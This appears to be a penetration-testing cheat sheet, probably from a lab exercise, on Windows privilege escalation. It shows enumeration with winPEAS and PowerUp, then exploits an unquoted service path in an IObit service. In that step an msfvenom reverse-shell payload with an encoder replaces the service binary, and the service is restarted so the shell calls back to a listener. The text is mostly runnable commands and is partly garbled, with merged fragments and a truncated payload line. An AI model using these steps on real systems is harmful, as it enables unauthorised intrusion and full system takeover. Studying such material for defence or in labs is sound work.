Living of the land GTFO Bins for Windows
Enumeration with Winpeas
Copy wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/a17f91745cafc5fa43a428d766294190c0ff70a1/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe Enumeration with powerup.ps1
Copy https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 upload the script with metasploit
Copy upload /root/PowerSploit/Privesc/PowerUp.ps1 Now run the script with Powershell
Copy load Powershell
powershell_shell
.\PowerUp.ps1
Invoke-Allchecks The Iobit AdvancedSystemCareService9 service is vulnerable to path hijack. No quotes are being used to enclose the path.
unquoted service path vulnerability
Copy C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe Now create a reverse shell payload
Copy msfvenom -p windows/shell_reverse_tcp LHOST=10.10.3.221 LPORT=4443 -e x86/shikata_ga_nai - using reverse meterpreter payload dies if used and we have to chain it with post/windows/manage/migrate
Now upload the malicious file and changer meterpreter to shell, stop the service and then copy the file the same location, start listener at port 4443 and start the service again.
Copy upload ASCService.exe
shell
sc stop AdvancedSystemCareService9
copy ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9 and we got the reverse shell
Windows compiled exploits
